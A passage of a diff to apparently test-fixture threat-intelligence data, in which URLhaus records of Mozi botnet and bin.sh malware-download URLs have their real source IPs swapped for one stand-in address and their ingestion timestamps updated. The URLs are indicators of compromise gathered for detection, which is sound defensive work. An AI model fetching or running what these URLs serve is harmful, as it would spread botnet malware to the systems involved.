"{\"id\":\"961280\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961280/\",\"url\":\"http://89.160.20.156:40247/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12779,18 +12779,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://61.53.42.182:36619/i", + "original": "http://89.160.20.156:36619/i", "scheme": "http", "port": 36619, - "domain": "61.53.42.182", - "full": "http://61.53.42.182:36619/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36619/i" }, - "ip": "61.53.42.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693508173Z", - "original": "{\"id\":\"961281\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961281/\",\"url\":\"http://61.53.42.182:36619/i\",\"url_status\":\"offline\",\"host\":\"61.53.42.182\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026408800Z", + "original": "{\"id\":\"961281\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961281/\",\"url\":\"http://89.160.20.156:36619/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12828,18 +12828,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.141.246:43673/Mozi.m", + "original": "http://89.160.20.156:43673/Mozi.m", "scheme": "http", "port": 43673, - "domain": "125.41.141.246", - "full": "http://125.41.141.246:43673/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43673/Mozi.m" }, - "ip": "125.41.141.246" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693512862Z", - "original": "{\"id\":\"961282\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961282/\",\"url\":\"http://125.41.141.246:43673/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.141.246\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026415700Z", + "original": "{\"id\":\"961282\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961282/\",\"url\":\"http://89.160.20.156:43673/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12877,18 +12877,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.42.123.186:55726/Mozi.m", + "original": "http://89.160.20.156:55726/Mozi.m", "scheme": "http", "port": 55726, - "domain": "125.42.123.186", - "full": "http://125.42.123.186:55726/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55726/Mozi.m" }, - "ip": "125.42.123.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693519213Z", - "original": "{\"id\":\"961283\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961283/\",\"url\":\"http://125.42.123.186:55726/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.42.123.186\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026422500Z", + "original": "{\"id\":\"961283\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961283/\",\"url\":\"http://89.160.20.156:55726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12926,18 +12926,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.86.244:59668/Mozi.m", + "original": "http://89.160.20.156:59668/Mozi.m", "scheme": "http", "port": 59668, - "domain": "182.119.86.244", - "full": "http://182.119.86.244:59668/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59668/Mozi.m" }, - "ip": "182.119.86.244" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693522910Z", - "original": "{\"id\":\"961284\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961284/\",\"url\":\"http://182.119.86.244:59668/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.86.244\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026429400Z", + "original": "{\"id\":\"961284\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961284/\",\"url\":\"http://89.160.20.156:59668/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -12975,18 +12975,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.194.150.198:34391/Mozi.m", + "original": "http://89.160.20.156:34391/Mozi.m", "scheme": "http", "port": 34391, - "domain": "117.194.150.198", - "full": "http://117.194.150.198:34391/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34391/Mozi.m" }, - "ip": "117.194.150.198" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693526317Z", - "original": "{\"id\":\"961278\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961278/\",\"url\":\"http://117.194.150.198:34391/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.194.150.198\",\"date_added\":\"2021-01-14 19:19:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026436300Z", + "original": "{\"id\":\"961278\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961278/\",\"url\":\"http://89.160.20.156:34391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13024,18 +13024,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.242.209.61:49478/Mozi.m", + "original": "http://89.160.20.156:49478/Mozi.m", "scheme": "http", "port": 49478, - "domain": "117.242.209.61", - "full": "http://117.242.209.61:49478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49478/Mozi.m" }, - "ip": "117.242.209.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693529413Z", - "original": "{\"id\":\"961277\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961277/\",\"url\":\"http://117.242.209.61:49478/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.242.209.61\",\"date_added\":\"2021-01-14 19:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026443400Z", + "original": "{\"id\":\"961277\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961277/\",\"url\":\"http://89.160.20.156:49478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13073,18 +13073,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.200.34:54670/Mozi.m", + "original": "http://89.160.20.156:54670/Mozi.m", "scheme": "http", "port": 54670, - "domain": "117.247.200.34", - "full": "http://117.247.200.34:54670/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54670/Mozi.m" }, - "ip": "117.247.200.34" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693533270Z", - "original": "{\"id\":\"961276\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961276/\",\"url\":\"http://117.247.200.34:54670/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.200.34\",\"date_added\":\"2021-01-14 19:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026450300Z", + "original": "{\"id\":\"961276\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961276/\",\"url\":\"http://89.160.20.156:54670/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13122,18 +13122,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.133.53:59599/Mozi.m", + "original": "http://89.160.20.156:59599/Mozi.m", "scheme": "http", "port": 59599, - "domain": "115.58.133.53", - "full": "http://115.58.133.53:59599/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59599/Mozi.m" }, - "ip": "115.58.133.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693536646Z", - "original": "{\"id\":\"961270\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961270/\",\"url\":\"http://115.58.133.53:59599/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.133.53\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026457200Z", + "original": "{\"id\":\"961270\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961270/\",\"url\":\"http://89.160.20.156:59599/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13171,18 +13171,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.56.130.11:45189/Mozi.a", + "original": "http://89.160.20.156:45189/Mozi.a", "scheme": "http", "port": 45189, - "domain": "115.56.130.11", - "full": "http://115.56.130.11:45189/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45189/Mozi.a" }, - "ip": "115.56.130.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693540123Z", - "original": "{\"id\":\"961271\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961271/\",\"url\":\"http://115.56.130.11:45189/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.130.11\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026464100Z", + "original": "{\"id\":\"961271\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961271/\",\"url\":\"http://89.160.20.156:45189/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13220,18 +13220,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.85.210.224:60805/Mozi.a", + "original": "http://89.160.20.156:60805/Mozi.a", "scheme": "http", "port": 60805, - "domain": "120.85.210.224", - "full": "http://120.85.210.224:60805/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60805/Mozi.a" }, - "ip": "120.85.210.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693543649Z", - "original": "{\"id\":\"961272\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961272/\",\"url\":\"http://120.85.210.224:60805/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.210.224\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026471100Z", + "original": "{\"id\":\"961272\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961272/\",\"url\":\"http://89.160.20.156:60805/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13269,18 +13269,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.56.27.220:38888/Mozi.m", + "original": "http://89.160.20.156:38888/Mozi.m", "scheme": "http", "port": 38888, - "domain": "115.56.27.220", - "full": "http://115.56.27.220:38888/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38888/Mozi.m" }, - "ip": "115.56.27.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693547076Z", - "original": "{\"id\":\"961273\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961273/\",\"url\":\"http://115.56.27.220:38888/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.56.27.220\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026478Z", + "original": "{\"id\":\"961273\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961273/\",\"url\":\"http://89.160.20.156:38888/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -13318,18 +13318,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://115.48.157.100:47869/Mozi.m",
+ "original": "http://89.160.20.156:47869/Mozi.m",
 "scheme": "http",
 "port": 47869,
- "domain": "115.48.157.100",
- "full": "http://115.48.157.100:47869/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:47869/Mozi.m"
 },
- "ip": "115.48.157.100"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693550292Z",
- "original": "{\"id\":\"961274\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961274/\",\"url\":\"http://115.48.157.100:47869/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.157.100\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026484900Z",
+ "original": "{\"id\":\"961274\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961274/\",\"url\":\"http://89.160.20.156:47869/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13367,18 +13367,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://103.157.241.40:57478/Mozi.m",
+ "original": "http://89.160.20.156:57478/Mozi.m",
 "scheme": "http",
 "port": 57478,
- "domain": "103.157.241.40",
- "full": "http://103.157.241.40:57478/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57478/Mozi.m"
 },
- "ip": "103.157.241.40"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693553408Z",
- "original": "{\"id\":\"961275\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961275/\",\"url\":\"http://103.157.241.40:57478/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.157.241.40\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026491900Z",
+ "original": "{\"id\":\"961275\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961275/\",\"url\":\"http://89.160.20.156:57478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13417,18 +13417,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://59.99.93.45:40256/bin.sh",
+ "original": "http://89.160.20.156:40256/bin.sh",
 "scheme": "http",
 "port": 40256,
- "domain": "59.99.93.45",
- "full": "http://59.99.93.45:40256/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40256/bin.sh"
 },
- "ip": "59.99.93.45"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693556594Z",
- "original": "{\"id\":\"961269\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961269/\",\"url\":\"http://59.99.93.45:40256/bin.sh\",\"url_status\":\"offline\",\"host\":\"59.99.93.45\",\"date_added\":\"2021-01-14 19:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.026498800Z",
+ "original": "{\"id\":\"961269\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961269/\",\"url\":\"http://89.160.20.156:40256/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:10:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13466,18 +13466,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://60.161.45.175:49035/Mozi.m",
+ "original": "http://89.160.20.156:49035/Mozi.m",
 "scheme": "http",
 "port": 49035,
- "domain": "60.161.45.175",
- "full": "http://60.161.45.175:49035/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49035/Mozi.m"
 },
- "ip": "60.161.45.175"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693560581Z",
- "original": "{\"id\":\"961268\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961268/\",\"url\":\"http://60.161.45.175:49035/Mozi.m\",\"url_status\":\"online\",\"host\":\"60.161.45.175\",\"date_added\":\"2021-01-14 19:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026505700Z",
+ "original": "{\"id\":\"961268\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961268/\",\"url\":\"http://89.160.20.156:49035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13515,18 +13515,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.54.215.77:41531/Mozi.m",
+ "original": "http://89.160.20.156:41531/Mozi.m",
 "scheme": "http",
 "port": 41531,
- "domain": "61.54.215.77",
- "full": "http://61.54.215.77:41531/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41531/Mozi.m"
 },
- "ip": "61.54.215.77"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693563747Z",
- "original": "{\"id\":\"961266\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961266/\",\"url\":\"http://61.54.215.77:41531/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.54.215.77\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026512800Z",
+ "original": "{\"id\":\"961266\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961266/\",\"url\":\"http://89.160.20.156:41531/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13564,18 +13564,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://59.99.41.229:49596/Mozi.a",
+ "original": "http://89.160.20.156:49596/Mozi.a",
 "scheme": "http",
 "port": 49596,
- "domain": "59.99.41.229",
- "full": "http://59.99.41.229:49596/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49596/Mozi.a"
 },
- "ip": "59.99.41.229"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693567093Z",
- "original": "{\"id\":\"961267\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961267/\",\"url\":\"http://59.99.41.229:49596/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.99.41.229\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026519800Z",
+ "original": "{\"id\":\"961267\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961267/\",\"url\":\"http://89.160.20.156:49596/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13613,18 +13613,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.52.197.146:43584/Mozi.m",
+ "original": "http://89.160.20.156:43584/Mozi.m",
 "scheme": "http",
 "port": 43584,
- "domain": "61.52.197.146",
- "full": "http://61.52.197.146:43584/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43584/Mozi.m"
 },
- "ip": "61.52.197.146"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693571421Z",
- "original": "{\"id\":\"961265\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961265/\",\"url\":\"http://61.52.197.146:43584/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.197.146\",\"date_added\":\"2021-01-14 19:07:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026526700Z",
+ "original": "{\"id\":\"961265\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961265/\",\"url\":\"http://89.160.20.156:43584/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:07:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -13662,18 +13662,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.92.181.82:44976/Mozi.m",
+ "original": "http://89.160.20.156:44976/Mozi.m",
 "scheme": "http",
 "port": 44976,
